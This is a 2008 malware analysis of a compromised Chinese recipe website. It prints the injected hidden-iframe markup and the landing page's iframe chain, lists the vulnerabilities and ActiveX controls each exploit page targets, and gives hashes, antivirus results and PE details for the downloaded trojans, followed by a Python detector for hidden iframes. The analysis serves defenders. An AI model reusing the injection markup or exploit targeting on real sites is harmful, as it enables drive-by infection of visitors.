A Chinese recipe website exploits N vulnerabilities to serve RootKit.Win32.RESSDT.dr and other malware
The site's web pages contain the following code:
/---
<iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0></iframe>
---/
#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm contains the code:
/---
<iframe. src="ms08001.htm" width=100 height=0></iframe>
<iframe. src="CcXpsp.htm" width=100 height=0></iframe>
<iframe. src="CcIE.htm" width=100 height=0></iframe>
<iframe. src="baidu.htm" width=10 height=0></iframe>
<iframe. src="bfyy.htm" width=10 height=0></iframe>
<iframe. src="cx.htm" width=10 height=0></iframe>
<iframe. src="JetAudio.htm" width=10 height=0></iframe>
<iframe. src="lz.htm" width=10 height=0></iframe>
<iframe. src="Media.htm" width=10 height=0></iframe>
<iframe. src="ms06014.htm" width=10 height=0></iframe>
<iframe. src="ms06042.htm" width=10 height=0></iframe>
<iframe. src="ms07017.htm" width=10 height=0></iframe>
<iframe. src="ms07027.htm" width=10 height=0></iframe>
<iframe. src="ms07033.htm" width=10 height=0></iframe>
<iframe. src="ms07055.htm" width=10 height=0></iframe>
<iframe. src="Office.htm" width=10 height=0></iframe>
<iframe. src="Opera.htm" width=10 height=0></iframe>
<iframe. src="qvld.htm" width=10 height=0></iframe>
<iframe. src="real.htm" width=10 height=0></iframe>
<iframe. src="Baidu.htm" width=10 height=0></iframe>
<iframe. src="Ruising.htm" width=10 height=0></iframe>
<iframe. src="Ruising.htm" width=10 height=0></iframe>
<iframe. src="Thunder.htm" width=10 height=0></iframe>
<iframe. src="TTplayer.htm" width=10 height=0></iframe>
<iframe. src="uc.htm" width=10 height=0></iframe>
<iframe. src="xlkk.htm" width=10 height=0></iframe>
<iframe. src="sinatv.htm" width=10 height=0></iframe>
<iframe. src="icyfox.htm" width=10 height=0></iframe>
<iframe. src="icyfox1.htm" width=10 height=0></iframe>
<iframe. src="jetaudio.htm" width=10 height=0></iframe>
<iframe. src="media.htm" width=10 height=0></iframe>
<iframe. src="bfyy1.htm" width=10 height=0></iframe>
<iframe. src="06014.htm" width=10 height=0></iframe>
<iframe. src="sina.htm" width=10 height=0></iframe>
<iframe. src="08011.htm" width=10 height=0></iframe>
<iframe. src="ls1.htm" width=10 height=0></iframe>
<iframe. src="lsx.htm" width=10 height=0></iframe>
<iframe. src="xunlei5.htm" width=10 height=0></iframe>
<iframe. src="real11.htm" width=10 height=0></iframe>
<iframe. src="office08.htm" width=10 height=0></iframe>
<iframe. src="systrsy.htm" width=10 height=0></iframe>
<iframe. src="hy.htm" width=10 height=0></iframe>
<iframe. src="niu.htm" width=10 height=0></iframe>
<iframe. src="MsVs.htm" width=10 height=0></iframe>
---/
Exploits the MS06-014 vulnerability to download hxxp://ruan*jian2008.cn/xzz.exe
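As an added example (not code from the original post or from the site analysed), a Python heuristic for the two-stage pattern shown above: it flags iframes that render nothing (a 0- or 1-pixel side, or display:none) and iframes that load from another host, and counts how many hidden targets one page fans out to. All hostnames and file names in the embedded sample HTML are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample pages mirroring the two stages described above; hosts and
# file names are placeholders, not the URLs from the post.
INJECTED_PAGE = """<html><body><h1>Recipes</h1>
<iframe src="http://landing.example.invalid/ruan/w/1.htm" width=1 height=0></iframe>
<iframe src="http://ads.example.invalid/widget.html" width="300" height="250"></iframe>
<iframe src="/forum/embed.html" width="600" height="400"></iframe>
</body></html>"""

# Stage-2 landing page: one hidden iframe per exploit page, as in the listing above.
LANDING_PAGE = "<html>" + "".join(
    f'<iframe src="{name}.htm" width=10 height=0></iframe>'
    for name in ["ms08001", "CcXpsp", "CcIE", "baidu", "bfyy", "ms06014", "ms07017"]
) + "</html>"

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def iframe_attrs(html):
    """Yield a lower-cased attribute dict for every <iframe> tag in html."""
    for tag in IFRAME_RE.finditer(html):
        attrs = {}
        for a in ATTR_RE.finditer(tag.group(1)):
            attrs[a.group(1).lower()] = a.group(2) or a.group(3) or a.group(4) or ""
        yield attrs


def _dim(value):
    """Parse a pixel width/height; anything else (e.g. '100%') counts as visible."""
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None


def is_hidden(attrs):
    """An iframe with a 0- or 1-pixel side, or display:none, renders nothing."""
    w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    return "display:none" in attrs.get("style", "").replace(" ", "").lower()


def find_suspicious_iframes(html, page_host):
    """Return (src, reasons) for iframes that are invisible and/or load off-site.

    Both reasons together (the injected tag on the victim site) are the strong
    signal; a visible off-site widget is only noted.
    """
    findings = []
    for attrs in iframe_attrs(html):
        src = attrs.get("src", "")
        reasons = []
        if is_hidden(attrs):
            reasons.append("zero-size")
        host = urlparse(src).hostname
        if host and host.lower() != page_host.lower():
            reasons.append("off-site")
        if reasons:
            findings.append((src, reasons))
    return findings


def fanout_count(html):
    """Distinct targets of hidden iframes: a landing page that fans out to
    dozens of exploit pages scores far above anything a normal page does."""
    return len({a.get("src", "") for a in iframe_attrs(html) if is_hidden(a)})
```

On a crawler the page_host check should use the registrable domain rather than the exact hostname, or legitimate subdomain embeds will be reported as off-site.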
#1.2 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcXpsp.htm
Exploits the MS06-014 vulnerability to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
文件说明符 : D:/test/xzz.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:24:37
修改时间 : 2008-9-4 16:24:38
大小 : 45056 字节 44.0 KB
MD5 : 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1: 78FE5A93EDAFFEA072239A8BE60106B054DB667D
CRC32: 2316933b
Antivirus engine | Version | Last update | Result |
AhnLab-V3 | 2008.9.3.0 | 2008.09.04 | - |
AntiVir | 7.8.1.28 | 2008.09.04 | TR/Dropper.Gen |
Authentium | 5.1.0.4 | 2008.09.03 | W32/Heuristic-KPP!Eldorado |
Avast | 4.8.1195.0 | 2008.09.03 | Win32:Trojan-gen {Other} |
AVG | 8.0.0.161 | 2008.09.03 | Generic11.NRC |
BitDefender | 7.2 | 2008.09.04 | - |
CAT-QuickHeal | 9.50 | 2008.09.02 | - |
ClamAV | 0.93.1 | 2008.09.04 | - |
DrWeb | 4.44.0.09170 | 2008.09.04 | MULDROP.Trojan |
eSafe | 7.0.17.0 | 2008.09.03 | - |
eTrust-Vet | 31.6.6066 | 2008.09.03 | - |
Ewido | 4.0 | 2008.09.03 | - |
F-Prot | 4.4.4.56 | 2008.09.03 | W32/Heuristic-KPP!Eldorado |
F-Secure | 8.0.14332.0 | 2008.09.04 | - |
Fortinet | 3.14.0.0 | 2008.09.03 | - |
GData | 19 | 2008.09.04 | Win32:Trojan-gen |
Ikarus | T3.1.1.34.0 | 2008.09.04 | - |
K7AntiVirus | 7.10.439 | 2008.09.03 | - |
Kaspersky | 7.0.0.125 | 2008.09.04 | - |
McAfee | 5376 | 2008.09.03 | - |
Microsoft | 1.3903 | 2008.09.04 | - |
NOD32v2 | 3413 | 2008.09.04 | - |
Norman | 5.80.02 | 2008.09.03 | W32/Smalldrp.AIHN |
Panda | 9.0.0.4 | 2008.09.03 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.03 | - |
Prevx1 | V2 | 2008.09.04 | - |
Rising | 20.60.30.00 | 2008.09.04 | RootKit.Win32.RESSDT.dr |
Sophos | 4.33.0 | 2008.09.04 | Mal/Dropper-AB |
Sunbelt | 3.1.1582.1 | 2008.09.02 | - |
Symantec | 10 | 2008.09.04 | Downloader |
TheHacker | 6.3.0.8.072 | 2008.09.04 | - |
TrendMicro | 8.700.0.1004 | 2008.09.04 | - |
VBA32 | 3.12.8.4 | 2008.09.03 | - |
ViRobot | 2008.9.2.1361 | 2008.09.03 | - |
VirusBuster | 4.5.11.0 | 2008.09.03 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.04 | Trojan.Dropper.Gen |
Additional information
File size: 45056 bytes
MD5...: 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1..: 78fe5a93edaffea072239a8be60106b054db667d
SHA256: 55ddfc834c2170e434106f08515bf54ec15522fec51c2e2a7a07bfd182e7233d
SHA512: 446b2f5a017f28ab441b902975882b146164087aebec12e3f818af07e528c43f2baf6e3610ef374da195bb591e316088afe88f11d25467bfe8557357f78cbd7c
PEiD..: Armadillo v1.71
TrID..: File type identification
  Win32 Executable MS Visual C++ (generic) (65.2%)
  Win32 Executable Generic (14.7%)
  Win32 Dynamic Link Library (generic) (13.1%)
  Generic Win/DOS Executable (3.4%)
  DOS Executable Generic (3.4%)
PEInfo: PE Structure information (base data)
  entrypointaddress.: 0x40197e
  timedatestamp.....: 0x48b2db0b (Mon Aug 25 16:17:15 2008)
  machinetype.......: 0x14c (I386)
  4 sections (name viradd virsiz rawdsiz ntrpy md5):
    .text  0x1000 0xb4a  0x1000 4.79 bae3f2b4fb31bd91eb6b567fc5eaf2f8
    .rdata 0x2000 0x79a  0x1000 2.96 c19fb51c229fa86b387eb1bc55d78c2e
    .data  0x3000 0x184  0x1000 0.66 9195ceb5daf1d9cd01606e8ba9348640
    .rsrc  0x4000 0x6f40 0x7000 2.83 6baf7034b48f7e8fa0dcae86e4d44413
  5 imports:
    KERNEL32.dll: CreateRemoteThread, GetProcAddress, GetModuleHandleA, WriteProcessMemory, VirtualAllocEx, lstrlenA, OpenProcess, ResumeThread, CreateProcessA, SetThreadPriority, GetCurrentThread, SetPriorityClass, lstrcatA, lstrcpyA, CreateToolhelp32Snapshot, GetShortPathNameA, GetModuleFileNameA, CloseHandle, SetFileTime, WriteFile, GetFileTime, CreateFileA, GlobalFree, LockResource, GlobalAlloc, LoadResource, SizeofResource, FindResourceA, WinExec, Process32First, Process32Next, GetCurrentProcess, GetSystemDirectoryA, Sleep, GetEnvironmentVariableA, GetStartupInfoA
    ADVAPI32.dll: RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegQueryValueExA
    MFC42.DLL: -, -, -, -
    MSVCRT.dll: exit, _acmdln, __getmainargs, tolower, __setusermatherr, _XcptFilter, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, _exit, _onexit, __dllonexit, _adjust_fdiv, __CxxFrameHandler, _initterm
    MSVCP60.dll: __0_Winit@std@@QAE@XZ, __1Init@ios_base@std@@QAE@XZ, __0Init@ios_base@std@@QAE@XZ, __1_Winit@std@@QAE@XZ
  0 exports
#1.3 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcIE.htm
Exploits the MS06-014 vulnerability to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.4 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/baidu.htm
Exploits the Baidu Toolbar (CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}) to download hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.5 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy.htm
Exploits a Baofeng Storm (暴风影音) player vulnerability (clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB) to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
文件说明符 : D:/test/4.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:43:49
修改时间 : 2008-9-4 16:46:30
大小 : 2222080 字节 2.122 MB
MD5 : 94ac223a30d22e18c24881e7e95728bc
SHA1: 5731768C4240D9912F02DF6AA8352B8F3F803866
CRC32: 7ec6399b
4.exe uses a folder icon.
File 4.rar received on 2008.09.04 11:01:42 (CET); result: 12/36 (33.34%)
Antivirus engine | Version | Last update | Result |
AhnLab-V3 | 2008.9.3.0 | 2008.09.04 | - |
AntiVir | 7.8.1.28 | 2008.09.04 | TR/Hijacker.Gen |
Authentium | 5.1.0.4 | 2008.09.03 | - |
Avast | 4.8.1195.0 | 2008.09.03 | Win32:Trojan-gen {Other} |
AVG | 8.0.0.161 | 2008.09.03 | PSW.Generic6.SCG |
BitDefender | 7.2 | 2008.09.04 | Dropped:Trojan.PWS.QQPass.NEG |
CAT-QuickHeal | 9.50 | 2008.09.02 | - |
ClamAV | 0.93.1 | 2008.09.04 | - |
DrWeb | 4.44.0.09170 | 2008.09.04 | MULDROP.Trojan |
eSafe | 7.0.17.0 | 2008.09.03 | - |
eTrust-Vet | 31.6.6069 | 2008.09.04 | - |
Ewido | 4.0 | 2008.09.03 | - |
F-Prot | 4.4.4.56 | 2008.09.03 | W32/Agent.S.gen!Eldorado |
F-Secure | 8.0.14332.0 | 2008.09.04 | - |
Fortinet | 3.14.0.0 | 2008.09.03 | - |
GData | 19 | 2008.09.04 | - |
Ikarus | T3.1.1.34.0 | 2008.09.04 | Trojan-PWS.Win32.QQPass.pb |
K7AntiVirus | 7.10.439 | 2008.09.03 | - |
Kaspersky | 7.0.0.125 | 2008.09.04 | - |
McAfee | 5376 | 2008.09.03 | - |
Microsoft | 1.3903 | 2008.09.04 | TrojanDropper:Win32/Delfdru.gen!A |
NOD32v2 | 3413 | 2008.09.04 | - |
Norman | 5.80.02 | 2008.09.03 | - |
Panda | 9.0.0.4 | 2008.09.03 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.03 | - |
Prevx1 | V2 | 2008.09.04 | - |
Rising | 20.60.30.00 | 2008.09.04 | - |
Sophos | 4.33.0 | 2008.09.04 | Mal/Behav-043 |
Sunbelt | 3.1.1592.1 | 2008.08.30 | - |
Symantec | 10 | 2008.09.04 | - |
TheHacker | 6.3.0.8.072 | 2008.09.04 | - |
TrendMicro | 8.700.0.1004 | 2008.09.04 | - |
VBA32 | 3.12.8.4 | 2008.09.02 | MalwareScope.Trojan-PSW.Game.16 |
ViRobot | 2008.9.2.1361 | 2008.09.03 | - |
VirusBuster | 4.5.11.0 | 2008.09.03 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.04 | Trojan.Hijacker.Gen |
Additional information
File size: 1836884 bytes
MD5...: f90b42115323b398c54001a94623b3de
SHA1..: 81d454d14047adc008d36954c2385d1e0388d7bc
SHA256: a3edb0fa4d5996ee2d9275c72de6bf980b1fbb223a5d779007f54d8f66cb67b3
SHA512: 4096d3f11e30f747f90a7e7027bc50cdfc3b97a892daa24c0c1bbff151c500bb5a92632320e01aeaf869babb8b48af17eb0c8c595ccfabd940d7f95b1ca2741e
PEiD..: -
TrID..: File type identification
  RAR Archive (83.3%)
  REALbasic Project (16.6%)
PEInfo: -
packers (Kaspersky): UPack
#1.6 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/cx.htm
Exploits a SSReader (超星阅读器) vulnerability (clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2) to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.7 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/JetAudio.htm
Exploits a vulnerability in the Korean jetAudio player ActiveX control (clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8) to download hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.8 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lz.htm
Exploits a Lianzhong World (联众世界) vulnerability (clsid:61F5C358-60FB-4A23-A312-D2B556620F20) to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.9 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Media.htm
Exploits the MS07-017 vulnerability to download hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/wm.cur and hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.13 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07027.htm
Exploits the MS07-027 vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.14 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07033.htm
Exploits the MS07-033 vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.15 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07055.htm
Exploits the MS07-055 vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.16 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Office.htm
Exploits a Microsoft Office Snapshot Viewer ActiveX vulnerability (clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9) to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.17 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Opera.htm
Exploits an Opera browser vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.18 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/qvld.htm
/---
File does not exist
---/
#1.19 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real.htm
Exploits a RealPlayer vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.20 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Ruising.htm
Exploits the remote code execution vulnerability in the Rising free online virus scan OL2005.dll ActiveX control (clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153) to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.21 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Thunder.htm
Exploits a Xunlei/Thunder (ThunderServer.webThunder.1) vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.22 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/TTplayer.htm
Exploits the TTPlayer (千千静听) ttp_mod.dll (CLSID:89AE5F82-410A-4040-9387-68D1144EFD03) .med file parsing heap overflow vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.23 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/uc.htm
Exploits a Sina UC (BROWSER2UC.BROWSERToUC) overflow vulnerability to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.24 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xlkk.htm
Exploits a Xunlei Kankan (迅雷看看) vulnerability (clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F) to download hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.25 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/sinatv.htm
Exploits the arbitrary file download vulnerability in the Sina DLoader Class ActiveX control (clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A) to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.26 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox.htm
Downloads hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.27 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox1.htm
Downloads hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.28 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy1.htm
Exploits the arbitrary file download vulnerability in the Sina DLoader Class ActiveX control (clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A) to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.29 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/08011.htm
Exploits the MS08-011 vulnerability (Microsoft Office .WPS File Stack Overflow Exploit, clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6) to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.30 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ls1.htm
Exploits a Lianzhong World (联众世界) vulnerability (clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69) to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.31 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lsx.htm
Exploits a Lianzhong World (联众世界) vulnerability (clsid:61F5C358-60FB-4A23-A312-D2B556620F20) to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.32 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xunlei5.htm
Exploits a Xunlei 5 (clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266) vulnerability to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.33 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real11.htm
/---
File does not exist
---/
#1.34 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/office08.htm
Uses the MS Office Snapshot Viewer ActiveX (snpvw.Snapshot Viewer Control.1) exploit to download hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.35 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/systrsy.htm
Downloads hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe, 1.exe and 2.exe
文件说明符 : D:/test/1.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-31 18:15:35
修改时间 : 2008-8-31 18:15:42
大小 : 632832 字节 618.0 KB
MD5 : 83fcf34cef2699f9f29a7906f758e6d6
SHA1: 0C0E3EE9FDBC8355329CD9B5CA9FF82EF373E537
CRC32: 83590948
Antivirus engine | Version | Last update | Result |
AhnLab-V3 | 2008.9.2.0 | 2008.09.02 | - |
AntiVir | 7.8.1.23 | 2008.09.01 | TR/Dropper.Gen |
Authentium | 5.1.0.4 | 2008.09.02 | - |
Avast | 4.8.1195.0 | 2008.09.01 | Win32:Monga |
AVG | 8.0.0.161 | 2008.09.01 | Pakes.L |
BitDefender | 7.2 | 2008.09.02 | Trojan.Inject.GO |
CAT-QuickHeal | 9.50 | 2008.08.29 | (Suspicious) - DNAScan |
ClamAV | 0.93.1 | 2008.09.02 | - |
DrWeb | 4.44.0.09170 | 2008.09.01 | - |
eSafe | 7.0.17.0 | 2008.09.01 | - |
eTrust-Vet | 31.6.6062 | 2008.09.01 | - |
Ewido | 4.0 | 2008.09.01 | - |
F-Prot | 4.4.4.56 | 2008.09.02 | W32/Hupigon.O.gen!Eldorado |
F-Secure | 7.60.13501.0 | 2008.09.02 | - |
Fortinet | 3.14.0.0 | 2008.09.02 | W32/Hupigon.GE!tr.bdr |
GData | 19 | 2008.09.02 | - |
Ikarus | T3.1.1.34.0 | 2008.09.02 | Virus.Win32.Virtualizer |
K7AntiVirus | 7.10.435 | 2008.09.01 | - |
Kaspersky | 7.0.0.125 | 2008.09.02 | - |
McAfee | 5374 | 2008.09.01 | - |
Microsoft | 1.3807 | 2008.09.02 | - |
NOD32v2 | 3406 | 2008.09.02 | - |
Norman | 5.80.02 | 2008.09.01 | - |
Panda | 9.0.0.4 | 2008.09.02 | - |
PCTools | 4.4.2.0 | 2008.09.01 | - |
Prevx1 | V2 | 2008.09.02 | - |
Rising | 20.60.10.00 | 2008.09.02 | - |
Sophos | 4.33.0 | 2008.09.02 | Mal/Emogen-E |
Sunbelt | 3.1.1592.1 | 2008.08.30 | VIPRE.Suspicious |
Symantec | 10 | 2008.09.02 | - |
TheHacker | 6.3.0.8.069 | 2008.09.01 | - |
TrendMicro | 8.700.0.1004 | 2008.09.02 | Cryp_Pai-6 |
VBA32 | 3.12.8.4 | 2008.09.01 | - |
ViRobot | 2008.9.1.1359 | 2008.09.01 | - |
VirusBuster | 4.5.11.0 | 2008.09.01 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.01 | Trojan.Dropper.Gen |
Additional information
File size: 632832 bytes
MD5...: 83fcf34cef2699f9f29a7906f758e6d6
SHA1..: 0c0e3ee9fdbc8355329cd9b5ca9ff82ef373e537
SHA256: f24089c722f0c3a75486880df48be170e7ce158236fa24dcb29104aab095bc86
SHA512: c098704adc12aa51c2e58996b5cb4d9a4b7ce8f27e42a49c2e88e5fc1bbf866d568a990515388f162672a2b1b64de1c83f9deaadf3af4f5ad497aa27afca02f8
PEiD..: ASProtect 1.33 - 2.1 Registered -> Alexey Solodovnikov
TrID..: File type identification
  Win32 Executable Generic (68.0%)
  Generic Win/DOS Executable (15.9%)
  DOS Executable Generic (15.9%)
  Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information (base data)
  entrypointaddress.: 0x105c000
  timedatestamp.....: 0x41107bc1 (Wed Aug 04 06:01:37 2004)
  machinetype.......: 0x14c (I386)
  6 sections (name viradd virsiz rawdsiz ntrpy md5):
    (no name) 0x1000  0x5b000 0x0     0.00 d41d8cd98f00b204e9800998ecf8427e
    (no name) 0x5c000 0x5b000 0x58800 8.00 09ddf420c4b737f1fc0fcca9b9814128
    .rsrc     0xb7000 0x1000  0x200   4.96 fc7daca374c150fdc7edf901caf58e64
    (no name) 0xb8000 0x1000  0x200   7.60 61676096051219ccea18f55cee2ca4a2
    .data     0xb9000 0x42000 0x41800 7.91 1c2377ccc939c0ddb44bab600b4f84a7
    .adata    0xfb000 0x1000  0x0     0.00 d41d8cd98f00b204e9800998ecf8427e
  3 imports:
    kernel32.dll: GetProcAddress, GetModuleHandleA, LoadLibraryA
    oleaut32.dll: VariantChangeTypeEx
    kernel32.dll: RaiseException
  0 exports
packers (Kaspersky): PE_Patch
packers (Avast): ASProtect
文件说明符 : D:/test/2.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 6.00.2900.3300 (xpsp.080125-2028)
说明 : Win32 Cabinet Self-Extractor
版权 : (C) Microsoft Corporation. 保留所有权利.
产品版本 : 6.00.2900.3300
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
内部名称 : Wextract
源文件名 : WEXTRACT.EXE
创建时间 : 2008-8-31 18:15:25
修改时间 : 2008-8-31 18:15:33
大小 : 740352 字节 723.0 KB
MD5 : 60ad4121a6309e439b74dc7bb749e553
SHA1: 8793BC8001E902588910C880B2BF77331F075DCE
CRC32: 2334ca4c
Contains: 5.exe
文件说明符 : D:/test/5.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-7-17 11:1:36
修改时间 : 2008-7-17 11:1:36
大小 : 681984 字节 666.0 KB
MD5 : 457870fa5975fdcf39ceeca5c85948e3
SHA1: E618F83981A32C5FEEA71357287F768C4B786093
CRC32: c887cd8b
Antivirus engine | Version | Last update | Result |
AhnLab-V3 | 2008.9.2.0 | 2008.09.02 | - |
AntiVir | 7.8.1.23 | 2008.09.01 | TR/Crypt.XPACK.Gen |
Authentium | 5.1.0.4 | 2008.09.02 | - |
Avast | 4.8.1195.0 | 2008.09.01 | - |
AVG | 8.0.0.161 | 2008.09.01 | - |
BitDefender | 7.2 | 2008.09.02 | MemScan:Trojan.Dropper.Delf.BCB |
CAT-QuickHeal | 9.50 | 2008.08.29 | (Suspicious) - DNAScan |
ClamAV | 0.93.1 | 2008.09.02 | - |
DrWeb | 4.44.0.09170 | 2008.09.01 | - |
eSafe | 7.0.17.0 | 2008.09.01 | - |
eTrust-Vet | 31.6.6062 | 2008.09.01 | - |
Ewido | 4.0 | 2008.09.01 | - |
F-Prot | 4.4.4.56 | 2008.09.02 | - |
F-Secure | 7.60.13501.0 | 2008.09.02 | - |
Fortinet | 3.14.0.0 | 2008.09.02 | - |
GData | 19 | 2008.09.02 | - |
Ikarus | T3.1.1.34.0 | 2008.09.02 | - |
K7AntiVirus | 7.10.435 | 2008.09.01 | - |
Kaspersky | 7.0.0.125 | 2008.09.02 | - |
McAfee | 5374 | 2008.09.01 | - |
Microsoft | 1.3807 | 2008.09.02 | - |
NOD32v2 | 3406 | 2008.09.02 | - |
Norman | 5.80.02 | 2008.09.01 | - |
Panda | 9.0.0.4 | 2008.09.02 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.01 | - |
Prevx1 | V2 | 2008.09.02 | - |
Rising | 20.60.10.00 | 2008.09.02 | - |
Sophos | 4.33.0 | 2008.09.02 | - |
Sunbelt | 3.1.1592.1 | 2008.08.30 | VIPRE.Suspicious |
Symantec | 10 | 2008.09.02 | - |
TheHacker | 6.3.0.8.069 | 2008.09.01 | - |
TrendMicro | 8.700.0.1004 | 2008.09.02 | - |
VBA32 | 3.12.8.4 | 2008.09.01 | - |
ViRobot | 2008.9.1.1359 | 2008.09.01 | - |
VirusBuster | 4.5.11.0 | 2008.09.01 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.01 | Trojan.Crypt.XPACK.Gen |
Additional information
File size: 681984 bytes
MD5...: 457870fa5975fdcf39ceeca5c85948e3
SHA1..: e618f83981a32c5feea71357287f768c4b786093
SHA256: f560317472a5c3e5a00c53ae04d2540135cf87406b9cd1229503f1367549193d
SHA512: fa619305dbd55713d5a640d57d3a15543a1a1afcada8d79dcc00ab57943f203a3e5e1873576887c0984b0882568cc1050dfef1333adadbd263523a46facfaedb
PEiD..: ASProtect v1.23 RC1
TrID..: File type identification
  Win32 Executable Generic (58.3%)
  Win16/32 Executable Delphi generic (14.1%)
  Generic Win/DOS Executable (13.7%)
  DOS Executable Generic (13.6%)
  Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEInfo: PE Structure information (base data)
  entrypointaddress.: 0x401000
  timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
  machinetype.......: 0x14c (I386)
  11 sections (name viradd virsiz rawdsiz ntrpy md5):
    (no name) 0x1000  0x2000  0x1000  7.95 ec55eb6e87785a30fa30184143bc91a0
    (no name) 0x3000  0x1000  0x200   7.57 efaf1a6c55af1485ae16869e097ea013
    (no name) 0x4000  0x1000  0x0     0.00 d41d8cd98f00b204e9800998ecf8427e
    (no name) 0x5000  0x1000  0x400   7.81 fcb57e634f692a1157a8d2adfc19daee
